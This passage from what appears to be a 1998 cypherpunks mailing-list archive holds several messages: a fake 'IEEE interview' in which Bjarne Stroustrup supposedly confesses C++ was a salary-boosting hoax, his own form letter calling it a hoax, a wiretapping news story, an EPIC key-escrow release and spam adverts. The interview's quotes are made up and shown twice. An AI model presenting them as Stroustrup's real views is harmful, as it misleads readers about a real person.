ridiculously complex syntax, obscure functions, and
pseudo-OO structure. Even now, nobody writes raw X-windows
code. Motif is the only way to go if you want to retain
your sanity.

Interviewer:  You're kidding...?

Stroustrup:  Not a bit of it. In fact, there was another problem.
Unix was written in 'C', which meant that any 'C' programmer
could very easily become a systems programmer. Remember
what a mainframe systems programmer used to earn?

Interviewer:  You bet I do, that's what I used to do.

Stroustrup:  OK, so this new language had to divorce itself from
Unix, by hiding all the system calls that bound the two
together so nicely. This would enable guys who only knew
about DOS to earn a decent living too.

Interviewer:  I don't believe you said that...

Stroustrup:  Well, it's been long enough, now, and I believe most
people have figured out for themselves that C++ is a waste
of time but, I must say, it's taken them a lot longer than I
thought it would.

Interviewer:  So how exactly did you do it?

Stroustrup:  It was only supposed to be a joke, I never thought
people would take the book seriously. Anyone with half a
brain can see that object-oriented programming is
counter-intuitive, illogical and inefficient.

Interviewer:  What?

Stroustrup:  And as for 're-useable code' - when did you ever hear
of a company re-using its code?

Interviewer:  Well, never, actually, but...

Stroustrup:  There you are then. Mind you, a few tried, in the
early days. There was this Oregon company - Mentor
Graphics, I think they were called - really caught a cold
trying to rewrite everything in C++ in about '90 or '91. I
felt sorry for them really, but I thought people would
learn from their mistakes.

Interviewer:  Obviously, they didn't?

Stroustrup:  Not in the slightest. Trouble is, most companies
hush-up all their major blunders, and explaining a $30
million loss to the shareholders would have been
difficult. Give them their due, though, they made it work in the end.

Interviewer:  They did?  Well, there you are then, it proves O-O
works.

Stroustrup:  Well, almost. The executable was so huge, it took
five minutes to load, on an HP workstation, with 128MB of
RAM. Then it ran like treacle. Actually, I thought this
would be a major stumbling-block, and I'd get found out
within a week, but nobody cared. Sun and HP were only too
glad to sell enormously powerful boxes, with huge resources
just to run trivial programs. You know, when we had our
first C++ compiler, at AT&T, I compiled 'Hello World', and
couldn't believe the size of the executable. 2.1MB

Interviewer:  What?  Well, compilers have come a long way, since
then.

Stroustrup:  They have?  Try it on the latest version of g++ - you
won't get much change out of half a megabyte. Also, there
are several quite recent examples for you, from all over the
world. British Telecom had a major disaster on their hands
but, luckily, managed to scrap the whole thing and start
again. They were luckier than Australian Telecom. Now I
hear that Siemens is building a dinosaur, and getting more
and more worried as the size of the hardware gets bigger, to
accommodate the executables. Isn't multiple inheritance a joy?

Interviewer:  Yes, but C++ is basically a sound language.

Stroustrup:  You really believe that, don't you?  Have you ever sat
down and worked on a C++ project?  Here's what happens:
First, I've put in enough pitfalls to make sure that only
the most trivial projects will work first time. Take
operator overloading. At the end of the project, almost
every module has it, usually, because guys feel they really
should do it, as it was in their training course. The same
operator then means something totally different in every
module. Try pulling that lot together, when you have a
hundred or so modules. And as for data hiding. God, I
sometimes can't help laughing when I hear about the problems
companies have making their modules talk to each other. I
think the word 'synergistic' was specially invented to twist
the knife in a project manager's ribs.

Interviewer:  I have to say, I'm beginning to be quite appalled at
all this. You say you did it to raise programmers' salaries?
That's obscene.

Stroustrup:  Not really. Everyone has a choice. I didn't expect
the thing to get so much out of hand. Anyway, I basically
succeeded. C++ is dying off now, but programmers still get
high salaries - especially those poor devils who have to
maintain all this crap. You do realize, it's impossible to
maintain a large C++ software module if you didn't actually
write it?

Interviewer:  How come?

Stroustrup:  You are out of touch, aren't you?  Remember the
typedef?

Interviewer:  Yes, of course.

Stroustrup:  Remember how long it took to grope through the header
files only to find that 'RoofRaised' was a double precision
number?  Well, imagine how long it takes to find all the
implicit typedefs in all the Classes in a major project.

Interviewer:  So how do you reckon you've succeeded?

Stroustrup:  Remember the length of the average-sized 'C' project?
About 6 months. Not nearly long enough for a guy with a
wife and kids to earn enough to have a decent standard of
living. Take the same project, design it in C++ and what do
you get?  I'll tell you. One to two years. Isn't that
great?  All that job security, just through one mistake of
judgement. And another thing. The universities haven't
been teaching 'C' for such a long time, there's now a
shortage of decent 'C' programmers. Especially those who
know anything about Unix systems programming. How many guys
would know what to do with 'malloc', when they've used 'new'
all these years - and never bothered to check the return
code. In fact, most C++ programmers throw away their return
codes. Whatever happened to good ol' '-1'?  At least you
knew you had an error, without bogging the thing down in all
that 'throw' 'catch' 'try' stuff.

Interviewer:  But, surely, inheritance does save a lot of time?

Stroustrup:  Does it?  Have you ever noticed the difference
between a 'C' project plan, and a C++ project plan?  The planning
stage for a C++ project is three times as long. Precisely
to make sure that everything which should be inherited is,
and what shouldn't isn't. Then, they still get it wrong.
Whoever heard of memory leaks in a 'C' program?  Now
finding them is a major industry. Most companies give up, and send
the product out, knowing it leaks like a sieve, simply to
avoid the expense of tracking them all down.

Interviewer:  There are tools...

Stroustrup:  Most of which were written in C++.

Interviewer:  If we publish this, you'll probably get lynched, you
do realize that?

Stroustrup:  I doubt it. As I said, C++ is way past its peak now,
and no company in its right mind would start a C++ project
without a pilot trial. That should convince them that it's
the road to disaster. If not, they deserve all they get.
You know, I tried to convince Dennis Ritchie to rewrite Unix in
C++.

Interviewer:  Oh my God. What did he say?

Stroustrup:  Well, luckily, he has a good sense of humor. I think
both he and Brian figured out what I was doing, in the early
days, but never let on. He said he'd help me write a C++
version of DOS, if I was interested.

Interviewer:  Were you?

Stroustrup:  Actually, I did write DOS in C++, I'll give you a
demo when we're through. I have it running on a Sparc 20 in the
computer room. Goes like a rocket on 4 CPU's, and only
takes up 70 megs of disk.

Interviewer:  What's it like on a PC?

Stroustrup:  Now you're kidding. Haven't you ever seen Windows
'95? I think of that as my biggest success. Nearly blew the
game before I was ready, though.

Interviewer:  You know, that idea of a Unix++ has really got me
thinking. Somewhere out there, there's a guy going to try it.

Stroustrup:  Not after they read this interview..

Interviewer:  I'm sorry, but I don't see us being able to publish
any of this.

Stroustrup:  But it's the story of the century. I only want to be
remembered by my fellow programmers, for what I've done
for them. You know how much a C++ guy can get these days?

Interviewer:  Last I heard, a really top guy is worth $70 - $80 an
hour.

Stroustrup:  See?  And I bet he earns it. Keeping track of all the
gotchas I put into C++ is no easy job. And, as I said
before, every C++ programmer feels bound by some mystic
promise to use every damn element of the language on every
project. Actually, that really annoys me sometimes, even
though it serves my original purpose. I almost like the
language after all this time.

Interviewer:  You mean you didn't before?

Stroustrup:  Hated it. It even looks clumsy, don't you agree?  But
when the book royalties started to come in... well, you get the picture.

Interviewer:  Just a minute. What about references?  You must
admit, you improved on 'C' pointers.

Stroustrup:  Hmm. I've always wondered about that. Originally, I
thought I had. Then, one day I was discussing this with a
guy who'd written C++ from the beginning. He said he could
never remember whether his variables were referenced or
dereferenced, so he always used pointers. He said the
little asterisk always reminded him.

Interviewer:  Well, at this point, I usually say 'thank you very
much' but it hardly seems adequate.

Stroustrup:  Promise me you'll publish this. My conscience is
getting the better of me these days.

Interviewer:  I'll let you know, but I think I know what my editor
will say.

Stroustrup:  Who'd believe it anyway?  Although, can you send me a
copy of that tape?

Interviewer:  I can do that.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Thu, 26 Mar 1998 10:30:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Mexican Bugs
Message-ID: <3.0.5.32.19980326103014.007bb190@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



http://www.foxnews.com/js_index.sml?content=/news/wires2/
	
Mexican wiretapping scandal places
 political reforms in doubt
March 26, 1998

 By Mark Stevenson, Associated Press


 MEXICO CITY (AP) - When members of
 an opposition party burst into a secret
 government wiretapping station this
 month, they did more than reveal a
 political scandal: They exposed some of
 the deepest secrets of common citizens
 in the coastal city of Campeche. 

 The wiretapping, apparently orchestrated
 by the state government to get
 information on opposition groups, has
 spawned a scandal that reaches into at
 least four other states. In most cases,
 opposition politicians were the targets. 

 But nowhere has the damage been as
 great as in Campeche, where a powerful eavesdropping system set
 up in a private home had the capacity to tap virtually all phones in
 the southern city of 200,000 people - and record some of their
 darkest lies and infidelities. 

 "We stood there in shock, in rage, impotence, as we heard
 recordings and read transcripts of our telephone conversations,''
 said Layda Sansores, a senator for the leftist opposition Democratic
 Revolution Party who discovered the surveillance center on a tip.
 "There are difficult moments over the course of seven years, things
 you don't want to remember.'' 

 "We heard a tape of one telephone call in which a man said he was
 with another man's wife. The wife was there in the room with us,
 listening,'' Sansores said at a news conference Wednesday. 

 A local journalist present during the March 3 raid on the
 surveillance center was quoted in one wiretap transcript as denying
 accusations of rape, noting he `just had fun with' an unidentified
 woman. "We haven't seen him in public since,'' Sansores said. 

 The taping in the city on the Gulf of Mexico, which used
 sophisticated computer equipment supplied by an Israeli firm,
 apparently began in 1991. Three men caught operating the bank of
 computers and phone switches have been arrested and charged with
 espionage and criminal association. Two had worked at some point
 for state police. 

 "We are a small family in Campeche, and this hurts our very
 fabric,'' Sansores said. 

 Documents uncovered by Sansores in the tiny, computerized
 wiretapping center - including dozens of tapes and transcripts of
 her own conversations "and those of everyone around me, nieces,
 sisters, my parents'' - suggest the eavesdropping was paid for by
 the Campeche state government. 

 The current government, which took office in late 1997, has
 blamed the wiretapping on a previous state governor and said the
 current governor didn't know about it. 

 Experts and politicians disagree on whether Mexico is experiencing
 a surge in wiretappings and surveillance, at a time when opposition
 groups are threatening the ruling Institutional Revolutionary Party's
 69-year uninterrupted grip on power. 

 Sansores claims that there are up to 22 of the eavesdropping
 stations around the country, and mentioned four other states where
 her supporters or party colleagues believe they have evidence of
 such surveillance. 

 On March 18, authorities seized a network of phone-tapping
 equipment and secret cameras in Monterrey that reportedly had
 been rented by politicians and businessmen in the northern city. 

 Several weeks earlier, a top official in the Mexico City government
 and also from the Democratic Revolution Party - the first
 opposition party ever to govern the capital - said she found two
 tiny surveillance cameras in her office. 

 "There is a new way of doing things when a new group comes to
 power,'' said Joel Estudillo, an analyst at the Mexican Institute of
 Political Studies. "Politicians say, `We have to find out what these
 people have done''' in the past. 

 In a closed political circle like that which has dominated Mexico for
 most of the century, secrets like past corruption are often known
 but seldom publicized until a grudge or a competition makes such
 information a valuable weapon, Estudillo said. 

 "Those kinds of understandings and internal arrangements have so
 far prevented espionage from becoming a big problem.'' 
------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

Maybe them boys in Jonesboro were trying out for Lon Horiuchi's job.










	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: emailprofits1@juno.com
Date: Thu, 26 Mar 1998 01:43:17 -0800 (PST)
To: <cypherpunks-unedited@toad.com>
Subject: as much business as you can handle
Message-ID: <37331546_44939965>
MIME-Version: 1.0
Content-Type: text/plain




Hello,

If You're Marketing a Product, Service, or Opportunity on the Internet, 
or Through an Online Service, or Have a Web Site, You Will *Definitely* 
Be Interested In What We Have To Offer.  


We'll send out Your General or *Targeted* E-mail Advertisement.  Period.  
No qualifiers, no conditions, no nonsense.  We'll do it quickly, and 
we'll do it at a *great price*.  Give us a call, and we'll give you 
advice on how to write your material, and much more.

and...         Our Services Are Guaranteed!

* Guaranteed Delivery And Minimum Response Rates!  Call For Details.
* Fresh, *Targeted* Names Compiled *Specifically* For Your Campaign
* Response Rates From 1% to 33% Have Been Achieved!
  (This also depends on your product and offer)
* Your EXCLUSIVE Ad!  Up To A Full Page. No Co-ops! 
* Experience, Experience, Experience.

       
   Call Us Today!  352.315.6100    24 Hrs!  EST  (mention code#: 322a)


	DIRECT E-MAIL WORKS!!


* YOUR MAILING IS ALWAYS SENT ON ITS OWN,
NEVER WITH ANY OTHER ADS!


If you receive 1% response for mailing 100,000 Email addresses
you would receive 1,000 replies!!!!

How much MONEY would YOU make?


PRICING:


Price with Random names.        

  100,000 names        $399.00   (Current Promotion:  $149 Limited Time Only!)
  250,000 names        $599.00         
  500,000 names        $799.00
  1,000,000 names      $999.00   
  5,000,000 names    $2,499.00


Prices With *Highly Targeted* Names by City, Hobbies, Job, 
Business Opportunity, MLM, "Women in Colorado Who Ski", Etc.,.
Response Rates From 1% to 33% (or Higher)!

  10,000 names      $399.00     (Current Promotion:  $149 Limited Time Only!)
  20,000 names      $599.00     
  30,000 names      $799.00     
  40,000 names      $999.00     
  50,000 names     $1199.00    
 100,000 names     $1999.00     (Promo: $999)


Start Generating As Many ORDERS and/or SIGNUPS as You Can Handle!
Call Us Right Now To Discuss Increasing Your Business And Cash Flow!

    
    Call Now!  352.315.6100    24 Hrs!  EST  (promo code#: 322a)


We Also Take All Major Credit Cards, and Checks By Fax/Phone!
Thank You And Have A Profitable Day!


352.315.6100  24 Hrs
407.493.3861  (ask for Marc)

(promo code#: 322a)
(mention this code when you call 
to receive the promotion prices!)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: webmaster@sexlink.net
Date: Thu, 26 Mar 1998 12:00:32 -0800 (PST)
To: webmaster@sexlink.net
Subject: Put your subject line here
Message-ID: <199803262000.MAA17811@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
This is a subscriber mailing and is intended for Adult Webmasters Only. 
If you have received this e-mail in error you need only reply and your e-mail address will be removed from this list.
vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv

EARN $20.00 PER NEW MEMBER
=============================================
Join the fastest growing XXX webmaster program today!
For every new member you will receive $20.00 on each new $24.95
membership.

Click Here  http://www.xxxmarketing.com/ac/index.htm


GAY WEBSITE PARTNER PROGRAM PAYS $15.00
================================================
Add an alternative to your straight site or add this excellent webmaster
program to you Gay site today. This program pays out $15.00 per new
membership of $19.95

Click Here  http://www.xxxmarketing.com/americanstuds/index.htm


XXX FUN 4 U   AND SO IS THE $$$$MONEY$$$
================================================
Hot New XXX Hardcore site offers excellent partnership program.
For every new sign-up you will receive $15.00 per new member.

Click Here  http://www.xxxmarketing.com/xxxfun/index.htm

OPEN YOUR OWN XXX ADULT STORE FOR FREE TODAY
=============================================
Earn an average of $1,500.00 per month for adding 
a NEW Adult Store to your website. Our store looks just like your 
website!

We do all the work!  We ship, we process, we host, we do it 
all. Your only responsibility is marketing and promotion.  We
pay you a commission of 15% plus a 3% over-ride! 

Click Here http://www.xxxmarketing.com/store/index.htm


INCREASE YOU TRAFFIC....INCREASE YOUR SALES
===========================================
The SEX LINK NETWORK is giving you 2,500 FREE BANNER ADS
just for joining one of the most successful adult banner exchange programs
on the internet. Join right now and you will be credited with 2,500 FREE
ad, but this offer won't last long act today if you want the FREE BANNER
ADVERTISING.

Click Here To Join  http://www.xxxmarketing.com/sexlink/index.htm









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Romulo Moacyr Cholewa" <rmcholewa@bigfoot.com>
Date: Thu, 26 Mar 1998 07:34:15 -0800 (PST)
To: <fygrave@usa.net>
Subject: Re: Thought you'd like this alot (fwd)
Message-ID: <005501bd58cc$693f7120$0100a8c0@pioneer.rmc1.com.br>
MIME-Version: 1.0
Content-Type: text/plain


Begin of forwarded email message -------------------------------

From: bs@day.research.att.com[SMTP:bs@day.research.att.com]
Sent: Thursday, March 26, 1998 10:58 AM
To: albertoa@msconecta.com.br

Sorry to send you a form letter, but I have now received dozens of
copies of that "IEEE interview" hoax. Yes, it is (obviously) a hoax.
No, it is not a hoax done by me or any of my friends; had it been,
it would have been less crude and more funny.

If you want information about C++, see my articles and books.
You can find references, articles, book chapters, and even a couple
of genuine interviews on my homepages.

- Bjarne

Bjarne Stroustrup, AT&T Labs, http://www.research.att.com/~bs

End of forwarded email message --------------------------------


This is the answer, by himself.

Romulo Moacyr Cholewa
Home Page: http://rmcweb.home.ml.org
Corporate: RomuloC@MSConecta.com.br
Personal: RMCholewa@Bigfoot.com
---------------------------------

-----Original Message-----
From: Fyodor <fygrave@freenet.bishkek.su>
To: Bad_B0yZ:; <Bad_B0yZ:;>
Cc: cypherpunks@toad.com <cypherpunks@toad.com>
Date: Quinta-feira, 26 de Maro de 1998 02:03
Subject: Thought you'd like this alot (fwd)


>Heh... Wanna hear the C++ creator thoughts regarding the malevolent
>creation, he made?:-)
>
>=========/qoute/=======================/quote/====================
>[snip snip]
>Date: Mon, 09 Feb 1998 23:31:02 -0800
>Subject: Stroustrup's interview leaked...
>
>On the 1st of January, 1998, Bjarne Stroustrup gave an interview
>to the IEEE's 'Computer' magazine.
>
>Naturally, the editors thought he would be giving a retrospective
>view of seven years of object-oriented design, using the language
>he created.
>
>By the end of the interview, the interviewer got more than he had
>bargained for and, subsequently, the editor decided to suppress
>its contents, 'for the good of the industry' but, as with many of
>these things, there was a leak.
>
>Here is a complete transcript of what was said, unedited, and
>unrehearsed, so it isn't as neat as planned interviews.
>You will find it interesting...
>__________________________________________________________________
>Interviewer:  Well, it's been a few years since you changed the
>world of software design, how does it feel, looking back?
>
>Stroustrup:  Actually, I was thinking about those days, just
>before you arrived. Do you remember?  Everyone was writing 'C'
>and, the trouble was, they were pretty damn good at it.
>were turning out competent - I stress the word 'competent'
>graduates at a phenomenal rate. That's what caused the problem.
>
>Interviewer:  Problem?
>
>Stroustrup:  Yes, problem. Remember when everyone wrote Cobol?
>
>Interviewer:  Of course, I did too
>
>Stroustrup:  Well, in the beginning, these guys were like
>demi-gods. Their salaries were high, and they were treated like
>royalty.
>
>Interviewer:  Those were the days, eh?
>
>Stroustrup:  Right. So what happened?  IBM got sick of it, and
>invested millions in training programmers, till they were a dime
>a dozen.
>
>Interviewer:  That's why I got out. Salaries dropped within a
>year, to the point where being a journalist actually paid
>better.
>
>Stroustrup:  Exactly. Well, the same happened with 'C' programmers.
>
>Interviewer:  I see, but what's the point?
>
>Stroustrup:  Well, one day, when I was sitting in my office, I
>thought of this little scheme, which would redress the
>balance a little. I thought 'I wonder what would happen, if
>there were a language so complicated, so difficult to learn,
>that nobody would ever be able to swamp the market with
>programmers?  Actually, I got some of the ideas from X10,
>you know, X windows. That was such a bitch of a graphics
>system, that it only just ran on those Sun 3/60 things.
>They had all the ingredients for what I wanted. A really
>ridiculously complex syntax, obscure functions, and
>pseudo-OO structure. Even now, nobody writes raw X-windows
>code. Motif is the only way to go if you want to retain
>your sanity.
>
>Interviewer:  You're kidding...?
>
>Stroustrup:  Not a bit of it. In fact, there was another problem.
>Unix was written in 'C', which meant that any 'C' programmer
>could very easily become a systems programmer. Remember
>what a mainframe systems programmer used to earn?
>
>Interviewer:  You bet I do, that's what I used to do.
>
>Stroustrup:  OK, so this new language had to divorce itself from
>Unix, by hiding all the system calls that bound the two
>together so nicely. This would enable guys who only knew
>about DOS to earn a decent living too.
>
>Interviewer:  I don't believe you said that...
>
>Stroustrup:  Well, it's been long enough, now, and I believe most
>people have figured out for themselves that C++ is a waste
>of time but, I must say, it's taken them a lot longer than I
>thought it would.
>
>Interviewer:  So how exactly did you do it?
>
>Stroustrup:  It was only supposed to be a joke, I never thought
>people would take the book seriously. Anyone with half a
>brain can see that object-oriented programming is
>counter-intuitive, illogical and inefficient.
>
>Interviewer:  What?
>
>Stroustrup:  And as for 're-useable code' - when did you ever hear
>of a company re-using its code?
>
>Interviewer:  Well, never, actually, but...
>
>Stroustrup:  There you are then. Mind you, a few tried, in the
>early days. There was this Oregon company - Mentor
>Graphics, I think they were called - really caught a cold
>trying to rewrite everything in C++ in about '90 or '91. I
>felt sorry for them really, but I thought people would
>learn from their mistakes.
>
>Interviewer:  Obviously, they didn't?
>
>Stroustrup:  Not in the slightest. Trouble is, most companies
>hush-up all their major blunders, and explaining a $30
>million loss to the shareholders would have been
>difficult. Give them their due, though, they made it work in the end.
>
>Interviewer:  They did?  Well, there you are then, it proves O-O
>works.
>
>Stroustrup:  Well, almost. The executable was so huge, it took
>five minutes to load, on an HP workstation, with 128MB of
>RAM. Then it ran like treacle. Actually, I thought this
>would be a major stumbling-block, and I'd get found out
>within a week, but nobody cared. Sun and HP were only too
>glad to sell enormously powerful boxes, with huge resources
>just to run trivial programs. You know, when we had our
>first C++ compiler, at AT&T, I compiled 'Hello World', and
>couldn't believe the size of the executable. 2.1MB
>
>Interviewer:  What?  Well, compilers have come a long way, since
>then.
>
>Stroustrup:  They have?  Try it on the latest version of g++ - you
>won't get much change out of half a megabyte. Also, there
>are several quite recent examples for you, from all over the
>world. British Telecom had a major disaster on their hands
>but, luckily, managed to scrap the whole thing and start
>again. They were luckier than Australian Telecom. Now I
>hear that Siemens is building a dinosaur, and getting more
>and more worried as the size of the hardware gets bigger, to
>accommodate the executables. Isn't multiple inheritance a joy?
>
>Interviewer:  Yes, but C++ is basically a sound language.
>
>Stroustrup:  You really believe that, don't you?  Have you ever sat
>down and worked on a C++ project?  Here's what happens:
>First, I've put in enough pitfalls to make sure that only
>the most trivial projects will work first time. Take
>operator overloading. At the end of the project, almost
>every module has it, usually, because guys feel they really
>should do it, as it was in their training course. The same
>operator then means something totally different in every
>module. Try pulling that lot together, when you have a
>hundred or so modules. And as for data hiding. God, I
>sometimes can't help laughing when I hear about the problems
>companies have making their modules talk to each other. I
>think the word 'synergistic' was specially invented to twist
>the knife in a project manager's ribs.
>
>Interviewer:  I have to say, I'm beginning to be quite appalled at
>all this. You say you did it to raise programmers' salaries?
>That's obscene.
>
>Stroustrup:  Not really. Everyone has a choice. I didn't expect
>the thing to get so much out of hand. Anyway, I basically
>succeeded. C++ is dying off now, but programmers still get
>high salaries - especially those poor devils who have to
>maintain all this crap. You do realize, it's impossible to
>maintain a large C++ software module if you didn't actually
>write it?
>
>Interviewer:  How come?
>
>Stroustrup:  You are out of touch, aren't you?  Remember the
>typedef?
>
>Interviewer:  Yes, of course.
>
>Stroustrup:  Remember how long it took to grope through the header
>files only to find that 'RoofRaised' was a double precision
>number?  Well, imagine how long it takes to find all the
>implicit typedefs in all the Classes in a major project.
>
>Interviewer:  So how do you reckon you've succeeded?
>
>Stroustrup:  Remember the length of the average-sized 'C' project?
>About 6 months. Not nearly long enough for a guy with a
>wife and kids to earn enough to have a decent standard of
>living. Take the same project, design it in C++ and what do
>you get?  I'll tell you. One to two years. Isn't that
>great?  All that job security, just through one mistake of
>judgement. And another thing. The universities haven't
>been teaching 'C' for such a long time, there's now a
>shortage of decent 'C' programmers. Especially those who
>know anything about Unix systems programming. How many guys
>would know what to do with 'malloc', when they've used 'new'
>all these years - and never bothered to check the return
>code. In fact, most C++ programmers throw away their return
>codes. Whatever happened to good ol' '-1'?  At least you
>knew you had an error, without bogging the thing down in all
>that 'throw' 'catch' 'try' stuff.
>
>Interviewer:  But, surely, inheritance does save a lot of time?
>
>Stroustrup:  Does it?  Have you ever noticed the difference
>between a 'C' project plan, and a C++ project plan?  The planning
>stage for a C++ project is three times as long. Precisely
>to make sure that everything which should be inherited is,
>and what shouldn't isn't. Then, they still get it wrong.
>Whoever heard of memory leaks in a 'C' program?  Now
>finding them is a major industry. Most companies give up, and send
>the product out, knowing it leaks like a sieve, simply to
>avoid the expense of tracking them all down.
>
>Interviewer:  There are tools...
>
>Stroustrup:  Most of which were written in C++.
>
>Interviewer:  If we publish this, you'll probably get lynched, you
>do realize that?
>
>Stroustrup:  I doubt it. As I said, C++ is way past its peak now,
>and no company in its right mind would start a C++ project
>without a pilot trial. That should convince them that it's
>the road to disaster. If not, they deserve all they get.
>You know, I tried to convince Dennis Ritchie to rewrite Unix in
>C++.
>
>Interviewer:  Oh my God. What did he say?
>
>Stroustrup:  Well, luckily, he has a good sense of humor. I think
>both he and Brian figured out what I was doing, in the early
>days, but never let on. He said he'd help me write a C++
>version of DOS, if I was interested.
>
>Interviewer:  Were you?
>
>Stroustrup:  Actually, I did write DOS in C++, I'll give you a
>demo when we're through. I have it running on a Sparc 20 in the
>computer room. Goes like a rocket on 4 CPU's, and only
>takes up 70 megs of disk.
>
>Interviewer:  What's it like on a PC?
>
>Stroustrup:  Now you're kidding. Haven't you ever seen Windows
>'95? I think of that as my biggest success. Nearly blew the
>game before I was ready, though.
>
>Interviewer:  You know, that idea of a Unix++ has really got me
>thinking. Somewhere out there, there's a guy going to try it.
>
>Stroustrup:  Not after they read this interview..
>
>Interviewer:  I'm sorry, but I don't see us being able to publish
>any of this.
>
>Stroustrup:  But it's the story of the century. I only want to be
>remembered by my fellow programmers, for what I've done
>for them. You know how much a C++ guy can get these days?
>
>Interviewer:  Last I heard, a really top guy is worth $70 - $80 an
>hour.
>
>Stroustrup:  See?  And I bet he earns it. Keeping track of all the
>gotchas I put into C++ is no easy job. And, as I said
>before, every C++ programmer feels bound by some mystic
>promise to use every damn element of the language on every
>project. Actually, that really annoys me sometimes, even
>though it serves my original purpose. I almost like the
>language after all this time.
>
>Interviewer:  You mean you didn't before?
>
>Stroustrup:  Hated it. It even looks clumsy, don't you agree?  But
>when the book royalties started to come in... well, you get the picture.
>
>Interviewer:  Just a minute. What about references?  You must
>admit, you improved on 'C' pointers.
>
>Stroustrup:  Hmm. I've always wondered about that. Originally, I
>thought I had. Then, one day I was discussing this with a
>guy who'd written C++ from the beginning. He said he could
>never remember whether his variables were referenced or
>dereferenced, so he always used pointers. He said the
>little asterisk always reminded him.
>
>Interviewer:  Well, at this point, I usually say 'thank you very
>much' but it hardly seems adequate.
>
>Stroustrup:  Promise me you'll publish this. My conscience is
>getting the better of me these days.
>
>Interviewer:  I'll let you know, but I think I know what my editor
>will say.
>
>Stroustrup:  Who'd believe it anyway?  Although, can you send me a
>copy of that tape?
>
>Interviewer:  I can do that.
>
>
>
>
>
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Thu, 26 Mar 1998 13:07:08 -0800 (PST)
To: "'cryptography@c2.net>
Subject: FW: U.S. Official Cites Key Escrow Flaws
Message-ID: <6B5344C210C7D011835C0000F801276601003642@exna01.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain


Found this in sci.crypt. I'm suprised it didn't hit the lists yet.

Peter Trei
trei@ziplink.net


> -----Original Message-----
> From:	epic-news@epic.org [SMTP:epic-news@epic.org]
> Sent:	Wednesday, March 25, 1998 11:37 PM
> Subject:	U.S. Official Cites Key Escrow Flaws
> 
> 
> ==================================================================
> 
>        U.S. OFFICIAL CONCEDES THAT "KEY RECOVERY" ENCRYPTION
>           IS INFERIOR TO ALTERNATIVE PRIVACY TECHNIQUES
> 
> 
> FOR IMMEDIATE RELEASE                     CONTACT:
> Wednesday, March 25, 1998                 David Sobel/Dave Banisar
>                                           (202) 544-9240
> 
> WASHINGTON, DC -- A top U.S. official acknowledged more than a
> year ago that the Internet privacy technique championed by the
> Clinton Administration is "more costly and less efficient" than
> alternative methods that the government seeks to suppress.  The
> concession is contained in a newly-released high-level document on
> encryption policy obtained by the Electronic Privacy Information
> Center (EPIC).
> 
> In a November 1996 memorandum to other government officials,
> William A. Reinsch, the Commerce Department's Under Secretary for
> Export Administration, discussed the Administration's efforts to
> promote "escrowed" or "recoverable" encryption techniques in
> overseas markets.  Such techniques enable government agents to
> unscramble encrypted information and they form the cornerstone of
> current U.S. encryption policy.
> 
> After noting that government regulations permit the export of non-
> escrowed encryption products only to "safe end-users" such as
> foreign police and security agencies, Reinsch recognized the
> inferiority of the Administration's favored technology:
> 
>      Police forces are reluctant to use "escrowed" encryption
>      products (such as radios in patrol cars). They are more
>      costly and less efficient than non-escrowed products.
>      There can be long gaps in reception due to the escrow
>      features -- sometimes as long as a ten second pause. Our
>      own police do not use recoverable encryption products;
>      they buy the same non-escrowable products used by their
>      counterparts in Europe and Japan.
> 
> Ironically, Reinsch's concession is contained in a memorandum that
> discusses the Administration's strategy to "help the market
> transition from non-recoverable products to recoverable products."
> According to EPIC Legal Counsel David Sobel, the newly released
> document "suggests that the Clinton Administration is trying to
> sell key recovery technology while quietly recognizing its
> inferiority.  This approach will ultimately weaken the global
> position of the American computer industry and hold back the
> development of the privacy protections so badly needed on the
> Internet."
> 
> EPIC and other critics of current U.S. encryption policy have long
> maintained that "key escrow" and "key recovery" approaches
> compromise the security of private information by providing
> "backdoor" access to encrypted data.
> 
> The Reinsch memo was released in response to a Freedom of
> Information Act request EPIC submitted to the Department of State
> concerning the international activities of former U.S. "crypto
> czar" David Aaron.  That request is the subject of a pending
> federal lawsuit initiated by EPIC last year.
> 
> The memorandum is available at the EPIC website at:
> 
>      http://www.epic.org/crypto/key_escrow/reinsch_memo.html
> 
> 
>                              - end -
> 
> .




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Toto" <toto@sk.sympatico.ca>
Date: Thu, 26 Mar 1998 14:50:40 -0800 (PST)
To: "CypherPunks" <cypherpunks@toad.com>
Subject: WordSmith Crypto -- Fw: AWADmail Issue 8
Message-ID: <00c101bd591a$1d493280$2a63a58e@uymfdlvk>
MIME-Version: 1.0
Content-Type: text/plain



-----Original Message-----
From: Wordsmith <wsmith@wordsmith.org>
To: linguaphile@wordsmith.org <linguaphile@wordsmith.org>
Date: Thursday, March 26, 1998 1:35 PM
Subject: AWADmail Issue 8


>                         AWADmail Issue 8, March 26, 1998
>         A Compendium of Feedback on the Previous Week's Words in AWAD,
>            and Other Interesting Tidbits about Words and Languages
>
>------------------------------
>
>From: Anu Garg (anu@wordsmith.org)
>Subject: AWADmail is back!
>
>AWADmail is back after a long hiatus.  Last week's theme, "Words whose
>pronunciations differ a lot from their spellings" generated a huge
response.
>Some sent their favorite words in this category (colonel coming at the top
>of the list), while others forwarded poems lamenting the intractability of
>English orthoepy and orthography.  Here are selected responses.
>
>------------------------------
>
>From: E. Richard Cohen (ercohen@aol.com)
>Subject: Phonetic Pronunciation
>
>In line with this week's critique of English pronunciation, dare I bring up
>George Bernard Shaw's plea for spelling reform with the word 'GHOTI"
>
>GH   as in   "rough"
>O    as in   "women"
>TI   as in   "nation"
>
